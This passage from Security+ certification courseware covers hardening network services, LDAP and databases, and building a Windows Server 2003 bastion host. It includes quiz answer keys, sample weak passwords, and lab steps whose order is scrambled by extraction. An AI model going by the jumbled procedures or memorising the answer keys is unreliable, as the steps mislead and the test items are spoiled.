Network News Transfer Protocol (NNTP) is used to deliver news articles to users on the Internet. NNTP works in much the same way as e-mail does, except messages are delivered to newsgroups, not directly to end users. Newsgroups act as a storage or deposit area for messages that follow a common theme or deal with a common subject matter. A news client instead of an e-mail client is used to read these messages. To gain access to news postings, a user needs access to a news server. These news servers exchange messages by passing on any new messages they receive to other servers down the line. This process is very slow, and it can often take days to circulate a new message to all of the news servers on the system. In the recent past, this type of news application has lost a good deal of its appeal. Many individuals post news articles of dubious use to get a self-serving point across to a large group of people. This spamming of users and user groups has made the use of newsgroups less appealing. Typically, the NNTP server runs as a background process on one host and accepts connections from other hosts on the LAN. NNTP servers, while on a network, have similar vulnerabilities as other network services. Proper authentication mechanisms, disabling of unneeded services, anti-virus scanners, and application of relevant software and OS patches are effective methods of preventing attacks.

1334 CompTIA Security+ Certification


Do it!

C-2:

Discussing DNS and NNTP servers

Questions and answers


1 Out-of-date entries on DNS servers could cause a request to look up a host address and return an incorrect IP address for that host. True or false?
True

2 Configuring DNS servers to perform recursive queries also increases the risk of ___________.
spoofing

3 Common security threats to the DNS server include:


A

Cache poisoning Ping of death DNS spoofing DoS attacks Buffer overflow attacks All of the above

B
C D E

4 NNTP is used to deliver news articles to users on the Internet. True or false?
True

5 Typically, the NNTP server runs as a _______________ process on one host and accepts connections from other hosts on the LAN.
background

6 To prevent attacks on NNTP servers: A B C D


E

Deploy authentication mechanisms. Disable unneeded services. Install security patches. Install a virus scanner. All of the above.

Security baselines

1335

File and print servers


Explanation File and print servers are very important components of todays corporate networks. Its very hard to imagine an organization without file and print sharing capabilities. Because of their service role, its common for servers to store many of an organizations most valuable and confidential information resources. Security breaches on a network server can result in the disclosure of critical information or the loss of a capability that can affect the entire organization. Therefore, securing network servers should be a significant part of your network and information security strategy. Offering only essential network and OS services on a server Services are especially important because each added service might introduce new vulnerabilities to the system. Ideally, each network service should have a dedicated host. This setup enables the system administrator to configure the server based on the security requirements of the service running on it. Its important to make sure that the services are administered separately from each other to minimize conflicts between system administrators. Reducing the number of services also reduces the logging and monitoring activities, and thus optimizes resource utilization. System administrators should first determine which services need to be activated on the system. These services may include shared file sharing services, network configuration services (such as DNS or DHCP), printing services, application services, web services, and so on. Given alternative ways of providing the same system, system administrators should always choose the most secure method of accessing and maintaining a system. For example, on UNIX systems, Secure Shell (SSH) offers a more secure way of conducting remote system maintenance than does RSH, which uses IP addressing for authentication. After determining necessary services, system administrators need to ensure that only those services are activated. All the unneeded services, including the ones offered by the system kernel that may be running by default on the server, should be disabled. Finally, system administrators need to ensure that all unused open network ports on the server are eliminated because each open port is a potential target for attackers. Configuring servers for user authentication Unauthorized users can jeopardize the security of information that is stored on a computer or accessible from that computer. To prevent unauthorized users from jeopardizing the network resources and data, system administrators must configure proper authentication mechanisms. If available, its advisable to configure hardwarebased authentication such as Basic Input/Output System (BIOS) password authentication. Administrators should also remove all obsolete, default, and unneeded accounts to prevent their use by attackers. User groups and user accounts should be created based on the organizations security policy. Servers should be configured to deny login after a number of failed attempts, as well as require authentication after a period of inactivity. The authentication mechanisms of the individual services configured on a server should also be configured and deployed. Configuring server operating systems Configuring controls for server operating systems can minimize risks associated with intentional or unintentional acts that might damage system resources. Its also suggested that administrators configure file encryption capabilities for sensitive data.

1336 CompTIA Security+ Certification


Managing logging and other data collection mechanisms Collecting data generated by system, network, application, and user activities is essential for analyzing the security of the information assets and detecting signs of suspicious and unexpected behavior. Log files contain information about past activities. Administrators should identify the logging mechanisms and log types (system, file access, process, network, application-specific, and so forth) available for each asset, and identify the data recorded within each log. These mechanisms should monitor and inspect system resource utilization, network traffic, and file access, as well as scan for viruses and verify file and data integrity. Configuring servers for file backups Finally, because of the nature of information stored on file and print servers, system administrators should conduct periodic backups to avoid loss of data.

DHCP servers
Dynamic Host Configuration Protocol (DHCP) is a protocol for assigning dynamic IP addresses to devices on a network. With dynamic addressing, a device can have a different IP address every time it connects to the network. Dynamic addressing simplifies network administration because the software keeps track of IP addresses rather than requiring an administrator to manage the task. Although its a very useful tool that reduces the administrative burden, DHCP, like most Internet applications, has no security provisions and thus offers opportunities for attackers within an organization. Because DHCP is a broadcast-based protocol, a malicious user can set up a sniffer program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information. This information enables an attacker to gain unauthorized access to the network and the resources that reside on it. Because of the lack of security provisions for DHCP, its possible for a malicious user to configure an unauthorized DHCP server in an attempt to spoof the official DHCP server on the network. The original DHCP specification (RFC 2131) supports the use of redundant DHCP servers on the network. Although most clients listen to the last server (legitimate DHCP server) that they received a lease from, its possible for new clients on the network to fall into this trap and receive bogus network configuration information from the attacker. Furthermore, the attacker can launch a DoS attack against the DHCP server, either depleting the pool of available addresses on the server or consuming the resources of the DHCP server and making it unresponsive to client requests. By using such methods, an attacker can prevent users from accessing the network, or an attacker can provide false information about key resources and redirect users to bogus name servers, such as the attackers machine. The attacker could even provide his own IP address as a default gateway to intercept such private or confidential information as passwords.

Security baselines

1337

Following are steps that administrators can take to prevent such attacks from taking place on their networks: Its possible to assign permanent addresses with DHCP. This requires the administrator to collect the Media Access Control (MAC) addresses of all computers on the network and bind those addresses to corresponding IP addresses. However, this task introduces a substantial administrative burden, especially as the network grows. A less secure method is to use dynamic addressing but monitor the log files generated by DHCP, looking for new MAC addresses that can potentially belong to a malicious user. An administrator could also configure the DHCP server to force stations with new MAC addresses on the network to register with the DHCP server. Intrusion detection tools can detect the existence of a new DHCP server (attackers machine) on the network and notify the administrator of this fact. Its also extremely important to have the latest software and patches on the server to minimize risks associated with DHCP-related attacks. Do it!

C-3:

Discussing file, print, and DHCP servers

Questions and answers


1 List three measures you can take to secure a file or print server.
Answer may include:

Implement user authentication. Enforce strong user names and passwords. Perform regular account maintenance. Use file encryption where possible. Enable logging.

2 DHCP is a protocol for assigning static IP addresses to devices on a network. True or false?
False. DHCP assigns dynamic IP addresses.

3 An attack that allows a hacker to provide user computer stations with bogus IP address information, such as default gateway and DNS server information, uses the ________ service to execute the attack.
DHCP

4 Because DHCP is a broadcast-based protocol, a malicious user can set up a ________ program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information.
sniffer

1338 CompTIA Security+ Certification Data repositories


Explanation As the name suggests, a data repository is the place within an organization where data is stored for both archiving and user access. These repositories contain an organizations most valuable assets in terms of information. Just as an organization would not leave its file room unsecured, data repositories must be carefully protected. Baseline security policies must be developed to secure the repositories and to allow only those people with a need to know access to these valuable and sometimes vulnerable assets.

Directory services
The Lightweight Directory Access Protocol (LDAP) is the industry-standard protocol for providing networking directory services for the TCP/IP model. LDAP can be used to store and locate information about entities, such as organizations, individuals, and other network resources, such as file systems, applications, and configuration information. An LDAP directory is essentially a special kind of database that stores information. Its based on a simple tree-like hierarchy, called a Directory Information Tree (DIT). It starts with a root or source directory, such as a company domain, and branches out to more specific layers, such as departments, then individuals, and so on. Because LDAP is a network protocol for directory services, like other network protocols, its subject to attacks from within the network as well as remote attacks. The security threats to LDAP can be categorized into two groups: directory-service-oriented threats and nondirectory-service-oriented threats: Directory-service-oriented threats include the following: Unauthorized access to data by monitoring or spoofing authorized users operations. Unauthorized access to resources by physically taking over authenticated connections and sessions. Unauthorized modification or deletion of data or configuration parameters. Spoofing of directory services: Such attacks are employed to gain access to sensitive information. They may involve deceiving valid users with a faked directory, or interjecting misleading information into the communications session between the client and the real server. Excessive use of resources. Nondirectory-service-oriented threats include the following: Common network-based attacks against the LDAP servers, including the operating system and opening ports, processes, and services running on the hosts, to compromise the availability of resources. This is accomplished by viruses, worms, Trojan horses, and so forth. Attacks against the hosts by physically accessing the resources (operating system, files and directories, peripheral equipment, and so forth). Attacks against the back-end databases that provide directory services.

Security baselines LDAP authentication and authorization

1339

LDAP is engineered based on a client-server model that implements two key processes: authentication and authorization. To access the LDAP directory service, the LDAP client must first authenticate itself to the LDAP server. Once the authentication is completed, the server decides which resources, applications, and services are accessible by the client. This is the authorization process. LDAP implements three kinds of authentication methods: Anonymous authentication Simple authentication Simple Authentication and Security Layer (SASL) for LDAPv3 (Kerberos 4 for LDAP v2) The anonymous authentication occurs when no specific authentication method has been chosen. Under such circumstances, the client connects to the server as anonymous, provided that the server allows anonymous connections and allows certain data access for anonymous users. The simple authentication method is to send the LDAP server the authentication field with only the clients password in plaintext. Certainly, this mechanism has security problems because the password is sent in plaintext and is readable if tampered with from the network. To prevent the password from being exposed when simple authentication is used, communications between client and server should occur through a secure channel, such as SSL. Without an underlying secure method of transferal, the simple authentication method is highly vulnerable and should be disabled. SASL is the most secure type of method because it deploys an exchange of encrypted authentication data. Establishing secure requests and responses between the client and the server is just as important as the authentication and authorization processes. Such communication should take place through secure channels or sockets, such as SSL. Currently, most LDAP servers have this capability. To establish SSL connections, a port number should be specified to run the service on the LDAP server. Generally, the LDAP server uses port 636 as a standard SSL socket number of LDAP for TCP and UDP. The directory server can also support custom sockets. But the client has to identify the appropriate socket to access the directory services on the server through SSL.

Databases
The criticality of securing a database depends on a variety of factors, including the degree of confidentiality of the stored data and the access requirements as they relate to day-to-day operations of an organization. Data must be available to authorized people on a continuous basis so they can make intelligent business decisions. Databases can be vulnerable to attacks because of a number of reasons, including their complex structure, misconfiguration, or insecure password storage. The following sections cover general principles of security that should be enforced to protect databases from malicious acts.

1340 CompTIA Security+ Certification


Authentication of users and applications Its important to ensure that all users connecting to the database are legitimate users. Static passwords should be used as a minimum requirement for all connections. These passwords should be stored securely within the database in a strong encrypted format. Passwords should typically have a minimum length and should at least contain a combination of numbers and letters. A key element in database design is the process of determining access privileges for the users. This process is defined by the organizations business needs and security policies. Typically, each functional role within an organization has its corresponding access requirements. Job functions and the corresponding access items can be controlled by using the database roles, privileges, and standard database account security practices. The details of how to create roles and assign privileges to them are discussed at length in standard DBA manuals. A new form of architecture, called three-tier, requires an application server that holds and executes the application by using language such as Java to communicate with the workstation. The applications are executed on the server and communicate with the database. Typically, the workstation authenticates with the application server, and the application server authenticates with the database server. For the application to authenticate with the database, the application requires a user name and password (for a secure configured system). The user name and password should not be hard-coded into the application; therefore, some databases such as Oracle have mechanisms to get around this problem. These mechanisms, including such options as trust relationships, should be reviewed before implementation. Administration policies and procedures Efforts to secure organizational resources and data cannot succeed without the development of a written security policy. Using such policies, database administrators can align their efforts with that of the organization. Databases are increasingly becoming an integrated component of Web servers, Java applications, and other emerging technologies. Unmanaged security vulnerabilities within a database can lead to downtime, compromised system integrity, and lack of consumer confidence. Administration policies must clearly define how system and database patches are managed to ensure that all relevant patches are applied. Access control to objects and management of users can be simplified through the use of roles. A role is a collection of privileges that can be assigned to users. In addition to roles, profiles can be used to control allocation of database resources to users. Profiles can be used to prevent one user from performing an operation that might monopolize system resources and therefore deny access to other users. Many databases include default roles, which, if utilized, provide users with privileges that they do not require. Administration policies and procedures should ensure that default database roles are not used unless the capabilities of the roles are understood. Increasingly, database systems can be accessed through dial-up or Internet connections. Staff members who have left an organization constitute potential security risks. Policies and procedures within the organization should ensure that their access privileges are revoked in a timely manner to prevent the duplication or damage of data via remote connections.

Security baselines Initial configuration

1341

Certain database implementations, such as Oracles, have well-known default accounts and passwords that provide varying levels of access to data. During the initial configuration, these accounts should be disabled. A poorly configured database can be exploited to compromise an entire network. Such configuration flaws can provide an attacker with OS-level administration privileges that can be used to attack other network resources. An attacker can do this by gaining access to powerful built-in extended stored procedures. The database must be set up to prevent such exposure. For the database system to function correctly, the database system files must be installed and available. An attacker could crash a database or cause loss of data by removing such system files. Database system files must be set up with restricted Read and Write access so that an attacker cannot remove or modify these files. A security policy may require that all critical data files are stored in an encrypted format. Some databases support full database encryption, which adds another level of protection to the database. Auditing Most database implementations include many auditing features for database access and operations. In addition to database auditing features, changes to critical configuration files (such as the Oracle init file) should be logged to maintain a record of changes to the database. Auditing should take place for the following types of events: unsuccessful attempts to connect to the database; startup and shutdown of the database; viewing, modifying, or removing information from tables; creating or removing objects; and executing programs. Backup and recovery procedures Database corruption, accidental damage, and unauthorized or malicious activity can lead to huge losses without appropriate backup strategies. Backup and recovery procedures should be in place to minimize downtime and financial loss. Keeping information in the database up-to-date is critically important. Without backups and up-to-date information, organizations can suffer dramatic asset losses.

1342 CompTIA Security+ Certification


Do it!

C-4:

Directory services

Questions and answers


1 List three directory-service-oriented threats.
Monitoring or spoofing user requests to the directory service. Connection hijacking. Directory data modification. Directory service spoofing. Denial of service.

2 The three authentication types used by LDAPv3 are _______, _________, and _______.
anonymous, simple, SASL

3 The initial accounts created when a database is installed are the most secure accounts to use for user access to the database. True or false?
False. The default accounts and passwords are well known, and provide varying levels of access to the data. These accounts should be disabled.

4 Database system files must be set up with restricted _____________ access so that an attacker cannot remove or modify these files.
Read/Write

Security baselines

1343

Topic D: Workstations and servers


This topic covers the following CompTIA Security+ exam objectives:
# 3.1 Objective Understand security concerns and concepts of the following types of devices Workstations Servers 3.5 Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system OS / NOS (Operating System / Network Operating System) Hardening Updates (Hotfixes, Service Packs, Patches)

Securing computers
Explanation Covering all that needs to be done to completely secure a computer, whether a workstation or a server, is beyond the scope of this section. However, because basic workstation and server security is very similar, this discussion covers the general steps you should take. The following steps should ensure that your system is relatively secure: Remove any unnecessary protocols, such as NetBIOS or IPX, and services. Remove all unnecessary user accounts. Remove all unnecessary shares. Rename the administrator account. Use strong passwords. As mentioned previously, completely securing a personal computer requires that the computer be either disconnected from all network and telecom systems or placed behind a properly designed and implemented firewall. For in-depth defense, install a personal firewall and antivirus package on your system.

Personal firewall software packages


Several packages, including Norton Firewall, ZoneAlarm, Black Ice Defender, Tiny Softwares Personal Firewall, and many others, offer firewall options through software. Most of the available packages offer application-level blocking, packet filtering, and can put your computer into stealth mode by turning off most if not all of your ports. Examining these packages in detail is beyond the scope of this section, but reviews of almost any package can be found on the Internet.

Antivirus software packages


As with personal firewall packages, there are many vendors of antivirus software including McAfee, Norton, Computer Associates, and many more. There are dozens of Web sites that review the variety of available software. Antivirus software is necessary even if you have a secure network, because a trusted connection might become infected with a worm or virus and transmit the same to your system.

1344 CompTIA Security+ Certification Hardening the Windows Server 2003 server
If you plan to use a software-based firewall such as Microsofts ISA server or Checkpoint Firewall-1, it is very important that you harden the server prior to installing the firewall software. Once the hardening process is complete, the server is known as a bastion host. The first step to hardening a server is to apply the latest service pack and all patches and hotfixes. In the following activity, you will Install Windows Server 2003 and apply the latest service pack and patches. Do it!

D-1:

Installing Windows Server 2003 service packs and hotfixes Heres why
If necessary.

Heres how
If time is limited, skip activities D-1 through D-4.

1 Log on to your server as Administrator 2 Insert the Windows Server 2003 CD-ROM Close the autorun window 3 Click Start Choose Run 4 Click Browse 5 Navigate to your CD-ROM drive 6 Double-click English 7 Double-click WIN2003 8 Double-click STANDARD 9 Double-click i386 10 Double-click WINNT32.exe 11 Click OK 12 From the Installation Type dropdown list, select New
Installation (Advanced)

To install Windows Server 2003.

If it appears.

To run the file. To select the installation type.

Click Next 13 Accept the license agreement and click Next 14 Enter the product key and click
Next

Security baselines 15 On the Setup Options window, click Advanced Options 16 Change the Windows installation folder to \Bastion Click OK 17 Click Next 18 If you are prompted to upgrade to NTFS, select Use the NTFS
file system (recommended) Otherwise, continue with step 19.

1345

Click Next 19 Select No, skip this step and


continue installing Windows The setup program will copy files and restart the computer.

Click Next
.

20 Press e 21 Press g 22 Select the C: drive for the partition Press e 23 Press C

To begin the text-based portion of the server setup. When prompted to repair. If your C: drive is low on space, you can choose another partition. To choose the partition. To continue. The setup program will copy and install files, and then the computer will restart. The GUI portion will then run.

24 In the Regional and Language Options screen, click Next 25 Enter your name and organization Click Next 26 Select Per Device or Per
User To specify the licensing mode.

Click Next

1346 CompTIA Security+ Certification


27 Enter BASTIONXX Enter password Click Next and then click Yes 28 If prompted, enter your area code Click Next 29 Adjust the date and time settings to your area Click Next 30 Select Custom settings Click Next 31 Clear all boxes except for the TCP/IP protocol Click Next 32 If you have a second NIC installed, clear all boxes except for the TCP/IP protocol Click Next 33 Click Next
To make this computer part of the workgroup WORKGROUP. Windows starts installing components and restarts the computer when finished. This process may take some time to complete. If you only have one NIC installed, proceed to the next step. Network installation begins. For your computer name, where XX is your student number. For the password. To accept the password. Otherwise, continue with step 29.

34 Log on as Administrator 35 At the Manage Your Server screen, check Dont display this page at logon and then close the screen 36 Open Internet Explorer 37 Select In the future, do not
show this message in the future If prompted.

Click OK

To close the warning message.

Security baselines 38 Choose Tools, Internet


Options

1347

39 Activate the Security tab Select Internet and move the slider to Medium Click Yes Click OK
Students may be prompted for information about their Internet connection.

To save the change.

Go to http://www.microsoft.com/security
Using Internet Explorer. If prompted, provide information regarding the computers connection to the Internet.

40 Download the latest Service Pack and hotfixes 41 Install the Service Pack 42 Install any additional hotfixes 43 Shut down the server

For Windows Server 2003.

Accept the license agreements and archive the files.

1348 CompTIA Security+ Certification System accounts database


Explanation If an intruder can gain physical access to a server, utilities such as L0phtCrack can be used to get a list of accounts and passwords. One way to prevent this is to encrypt the accounts database. Beginning with Windows NT SP3, Microsoft provides the syskey tool to encrypt the accounts database. Syskey will create a random 128-bit encryption key, which is then protected with the system key. This program also offers the option to store the key on a floppy disk, which requires that the floppy disk be inserted to start the system. While this makes a system very secure, it can also be dangerous because if the floppy disk is lost or corrupt, Windows will have to be reinstalled.

Do it!

D-2:

Protecting the system accounts database Heres why


This is the first entry in the boot record.

Heres how
If time is limited, skip this activity.

1 Boot to the bastion host 2 Log on as Administrator 3 Change the Administrator password to Pa$$word 4 Click Start Choose Run Enter syskey

Notice that the Encryption Disabled option is not available. Windows Server 2003 encrypts the accounts database by default.

5 Click Update 6 Select Password Startup 7 Enter password as the password Click OK Click OK
Youll be notified that the Account Database Startup Key was changed.

Security baselines

1349

Complex passwords and other security settings


Explanation Password policies are very important in any networking environment. All nodes and devices on the network need to be protected from an intrusion, and passwords are the first line of defense. However, a weak password is almost as bad as no password at all. For example, all networking devices have default passwords that are readily available. Failure to change these passwords is a common and major mistake. Organizations without a full time IT staff are usually guilty of this. Creating a complex password requirement is one of the steps in creating a bastion host. To really lock down a computer, you can then use bastion.inf, which is a security policy template file. The bastion.inf file has recommended security settings for a machine that resides in a DMZ and as such, will be separated from the network. You can apply bastion.inf using the Security Configuration and Analysis mmc snap-in.

1350 CompTIA Security+ Certification


Do it!

D-3:

Configuring passwords and other security settings Heres why

Heres how
If time is limited, skip this activity.

1 Restart the server 2 Boot to the bastion host 3 For the Startup password, enter
password

4 Log on to the bastion server as Administrator 5 Click Start 6 Choose Administrative Tools, Local Security Policy 7 Expand Account Policies Select Password Policy 8 Double-click Password must
meet complexity requirements

(The password is Pa$$word.)

9 Select Enabled Click OK 10 Try to change the Administrator password to password 11 Click Start, then choose Run Enter mmc 12 Choose File, Add/Remove
Snap-in To open a new management console window. It will fail.

13 Click Add 14 Select Security


Configuration and Analysis

Click Add Click Close 15 Click OK

Security baselines 16 In the mmc console, right-click


Security Configuration and Analysis

1351

Choose Open Database 17 Type Bastion db Click Open


Inform students where to find the bastion.inf file.

Youll create a new security information database called Bastion db.

18 Navigate to and select


bastion.inf

Click Open 19 Right-click Security


Configuration and Analysis

Choose Configure Computer


Now

20 Click OK 21 Close the mmc window Click Yes Enter Bastion as the File name 22 Click Save 23 Restart the computer 24 Enter password for the Startup password 25 Log on as root

To apply the bastion.inf security template.

To save the console.

Youll receive a message that this is a private system and that unauthorized use is prohibited. The password is Pa$$word. The bastion.inf security policy template changed the Administrator account to root.

26 Click Start and then choose


Run

Enter cmd 27 Enter ipconfig

To open a Command window. No IP address is assigned because the security settings have disabled the DHCP client. As such, the machine is now isolated from the network.

28 Close the command window

1352 CompTIA Security+ Certification Configuring advanced network settings


Explanation Most intrusion attempts will take place over a network connection. These intrusions are not limited to remote users and hackers. The local network can also be used to exploit a weakness. In the following activity, you will lock down TCP/IP by removing any unnecessary protocols.

Do it!

D-4:

Configuring advanced network settings Heres why

Heres how
If time is limited, skip this activity. Make sure students boot to the original server partition, not the bastion host.

1 Restart the computer and boot to the original server partition, not the bastion host 2 Log on as Administrator 3 Click Start and then right-click
My Computer The password is password.

Choose Properties 4 Activate the Hardware tab 5 Click Device Manager

6 Choose View, Show hidden


devices

7 Expand Non-Plug and Play


Drivers

Security baselines 8 Right-click NetBIOS over


Tcpip

1353

Select Uninstall and then click


OK

9 Click Yes
Make sure students dont boot to the bastion host.

To restart the computer. Dont boot to the bastion host.

10 Boot to the regular server partition and log on as Administrator 11 Click Start, then choose
Control Panel, Network Connections and right-click Local Area Connection

Choose Properties 12 Double-click Internet


Protocol (TCP/IP) To configure TCP/IP filters.

13 Click Advanced Select the WINS tab Select Disable NetBIOS over
TCP/IP

14 Click OK three times 15 Repeat this process for all network cards 16 Open a command window.
Disable DNS before students ping another server by the computer name.

NetBIOS is now disabled on this server.

17 Ping another server in the room using only the computer name. 18 Ping another server in the room using the servers IP address 19 Close all open windows

It will fail because NetBIOS is disabled on the server. The ping is successful.

1354 CompTIA Security+ Certification


Do it!

D-5:

Reviewing Windows Server 2003 security

Exercises
1 Which of the following is a broadcast-based protocol? A B
C

TCP UDP NetBIOS IP

2 Windows Server 2003 offers another level of TCP/IP protection by supporting which of the following? A
B

PGP IPSec EFS MD5

C D

3 What are the steps you should take to ensure that your system is relatively secure? A B C D E
F

Remove any unnecessary protocols such as NetBIOS or IPX. Remove all unnecessary user accounts. Remove all unnecessary shares. Rename the administrator account. Use strong passwords. All of the above.

4 To configure TCP/IP filtering you will need to know which of the following? (Choose all that apply.)
A B

Protocol Port IP address Network-ID

C D

Security baselines

1355

Unit summary: Security baselines


Topic A In this topic, you learned how to harden the operating system and network operating system against attacks, malfunctions, and errors. You learned that removing unused applications and services, enforcing strong password and lockout policies, restricting access privileges, maintaining patches and updates, making regular backups, and logging all activities contribute to a more secure operating environment. You also learned how to harden the file system. You learned the significance of the principle of least privilege in restricting network access to a need-to-use basis. You also learned best practices in creating user accounts and groups, configuring access controls, implementing encryption, and installing system updates and patches. In this topic, you learned that network security can be maintained by timely firmware updates, by secure firewall and border router configuration, and by disabling unnecessary network services. Next, you identified the network services that are commonly exploited by attackers, including Remote Procedure Call (RPC), Simple Mail Transfer Protocol (SMTP), Simple Network Management Protocol (SNMP), and File Transfer Protocol (FTP). You also learned the best practices to safeguard these services against DoS attacks. In this topic, you learned that many applications that reside on networks are easy targets for attack. You learned that Web servers and other network devices, such as DNS servers, FTP servers, file and print servers, and DHCP servers, can be hardened against attack. You learned that best practices for hardening application servers include disabling unused services; maintaining current updates and patches; applying secure configurations; implementing strong encryption, authentication, and authorization; logging events; scanning for viruses; and making regular backups. In this topic, you learned how to protect workstations and servers using personal firewalls and antivirus software. You also learned how to harden the Windows Server 2003 server prior to installing firewall software using service packs, hotfixes, and registry modifications.

Topic B

Topic C

Topic D

Review questions
1 Describe OS/NOS hardening.
The process of modifying an operating systems default configuration to make it more secure from outside threats.

2 What is the purpose of the Microsoft Baseline Security Analyzer?


To scan local and remote machines for security issues with Microsoft Windows NT 4, Windows 2000, Windows Server 2003, Windows XP, IIS, SQL Server, Internet Explorer, and Office. Reports are generated with details after the scan is complete. In this activity, youll install MBSA and view the results.

3 What is the principle of least privilege?


Users should have the minimum amount of access needed to perform their jobs.

4 Windows Server 2003 only allows pre-defined security templates to be applied since administrator created security templates would leave the network vulnerable to attack. True or false?
False. The administrator can apply pre-made or custom made templates.

1356 CompTIA Security+ Certification


5 Encryption doesnt use many system resources, so it is the preferred method of securing a file system rather than using ACLs. True or false?
False

6 An administrator might choose to disable an application for which they have not yet obtained a security patch to address a security related problem that has been identified. True or false?
True

7 If an update is critical, you should skip the step of testing it in order to get the update installed as soon as possible. True or false?
False. While you could do this, you are putting the users systems at risk by doing so.

8 What is the trade-off for making systems easily accessible for customers and trade partners?
The easy accessibility makes them vulnerable to hackers and cyber terrorists.

9 Firmware is read-only, so cannot be upgraded. True or false?


False

10 Which is less receptive to attacks? A firewall with a static routing configuration or one with a dynamic routing configuration?
A static routing configuration is less receptive to attacks.

11 Which of the following are practices to follow when configuring routers and firewalls? (Choose all that apply.) A Allow IP-directed broadcasts through the system.
B C D

Configure devices with meaningful host names. Configure a loopback address. Restrict data traffic to required ports and protocols.

12 A(n) _________________ is a set of statements that controls the flow of packets through a device based on certain parameters and information contained within a packet.
Access Control List

13 Extrinsic information exists A Within a data packet


B

Outside of a data packet

C As a configurable parameter in a firewall D None of the above

Security baselines 14 Identify the term that each definition describes: Enhancements to an application.
Updates

1357

Fixes the bugs that are discovered after an application is released.


Hotfixes

Temporary fixes to a program.


Patches

Collections of fixes bundled together.


Service packs

15 Why is a Web server so vulnerable to attacks?


It is designed to make information accessible rather than to protect it.

16 How can an attacker circumvent firewall protection using e-mail protocols?


Most firewalls do not inspect e-mail and its contents.

17 FTP should only be deployed if there is a legitimate business need due to its insecure nature. True or false?
True

18 DNS servers are not vulnerable to DoS attacks. True or false?


False

19 List at least three steps you should take to ensure that your system is secure.
Remove unnecessary protocols, remove unnecessary user accounts, remove unnecessary shares, rename the administrator account, and use strong passwords.

20 List the steps to take in hardening a Windows Server 2003 server.


Apply service packs and hot fixes, protect the system accounts database, configure complex password requirements, and remove unnecessary protocols.

Independent practice activities


Creating users and groups Assume that you were hired by an attorney to help her secure her computers. Now she has two full-time assistants and three partners on board. In this project, youll create user accounts and groups for her. 1 First, create a matrix with user groups on one axis and categories of files on the other. For user groups, use Partners and Assistants. For simplicity, youll choose only three categories of files: Administrative and System Information, Case Data Files, and Sensitive Data.

1358 CompTIA Security+ Certification


2 To create new user accounts, click start, then right-click My Computer and choose Manage. In the Computer Management window that opens, expand the Local Users and Groups folder in the left-hand pane; then right-click on the Users folder, and choose New User. This opens a wizard that will guide you through the process of creating new user accounts. Follow the wizard to create Users 1 through 5 on your machine, each with their own passwords, as specified in the table below.
User 1 2 3 4 5 Username Katherine Joe Susan William Laura Group Assistants Assistants Partners Partners Partners Password User1User Sallyisgr8 cApe_coD str8Upthere o_U81_too

3 Create your two groups. From the Computer Management window, right-click the Groups folder in the left pane, and choose New Group. Name the group in the window that opens (according to the preceding table); then click the Add button. Specify or select users to add to this group (according to the preceding table). Follow this procedure to create and populate your second group. Assigning file permissions In this project, youll work with some folders. (The same procedure can be used for files.) 1 From Windows Explorer, create three folders under C:\: Administrative and System Information, Case Data Files, and Sensitive Data (again, this is primarily to keep things simple; normally there would be a lot more categories and folders than this). Here, youll apply permissions to these folders. 2 Right-click on any of the three folders you just created. Choose Properties from the shortcut menu, and activate the Security tab. 3 Click the Add button, and then specify or browse to and select (using the Advanced button) the groups you created to add them to the Name list. 4 Select each group from the Name list, one at a time, to apply appropriate permissions in the Permissions list, based on the matrix you created in the first project. 5 Do the same for the other two folders you created. 6 You can delete the folders that you created in this project, but save the user accounts and groups.

141

Unit 14 Cryptography
Unit time: 180 minutes Complete this unit, and youll know how to:
A Define the concepts of cryptography,

including algorithms, hashing, digital signatures, and digital certificates.


B Describe the Public Key Infrastructure

system.
C Explain key management and the

certificates life cycle.


D Install a certificate server.

142

CompTIA Security+ Certification

Topic A: Concepts of cryptography


This topic covers the following CompTIA Security+ exam objectives:
# 4.1 Objective Be able to identify and explain the following different kinds of cryptographic algorithms Hashing Symmetric Asymmetric 4.2 Understand how cryptography addresses the following security concepts Confidentiality Integrity Digital Signatures Authentication Non-Repudiation Digital Signatures Access Control 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates

Functions of cryptography
Explanation Cryptography is the process of converting readable text (plaintext) into unreadable series of characters and symbols (ciphertext). Cryptography allows users to transmit sensitive information over unsecured networks. Cryptography can be either strong or weak. The time and resources it takes to recover the plaintext measures the strength of a cryptographic method. Cryptography has four primary functions: Confidentiality Authentication Integrity Non-repudiation All are vital components in computer interaction. Confidentiality Confidentiality is often the most widely recognized component of cryptography. The primary purpose of early ciphers was to make sure that information was kept secret. When youre sending important data on a network, its of vital importance that the data remain confidential; otherwise, a company or organization could be giving away trade secrets or other information that could be damaging to the entity.

Cryptography Authentication

143

When data is being transferred, the receiver of a message should be able to verify the origin of that message. Without such authentication services, a data user would never know if the information received was from a legitimate sender or from a malicious attacker masquerading as a legitimate sender. Integrity The data in transit should also pass verification that it has not been tampered with or altered and that it maintains its integrity. Imagine what could happen if a sender sent his data via the network and a malicious third party intercepted the data. The third party could alter the data or add malicious code, such as a virus, and then send the information along to its intended recipient. Without encryption, the recipient would not be able to identify whether the integrity of the data was acceptable, and the recipient could very well use the corrupted data without even knowing it. Non-repudiation Another benefit of cryptography is non-repudiation, which means that the data sender cannot disavow that he or she did or did not send a certain piece of information.

Algorithms
Modern cryptography uses algorithms to encrypt and decrypt data. An algorithm is a set of instructions that works in tandem with a key. The same plaintext data encrypts into different ciphertext with different keys. The security of the data relies on two things: the strength of the algorithm and the secrecy of the key. Different algorithms offer different degrees of security. Determining whether or not an algorithm is sufficient depends on whether or not the cost of breaking the algorithm is greater than the value of the data, in terms of both time and resources needed. Modern cryptography employs two types of algorithms for encrypting and decrypting data: symmetric and asymmetric. The following table provides a quick comparison of the two types of algorithms. Its vital to understand how the two types differ and when you would use one type instead of the other.
Type Symmetric Advantages Single key Disadvantages Requires sender and receiver to agree on a key before transmission of data. Security of the algorithm lies solely with the key. High cost because dissemination of key information must be done over secure channels. Security of keys can be compromised when malicious users post phony keys. Slow method of encryption.

Asymmetric

Encryption and decryption keys are different. The decryption key cannot be calculated from the encryption key.

144

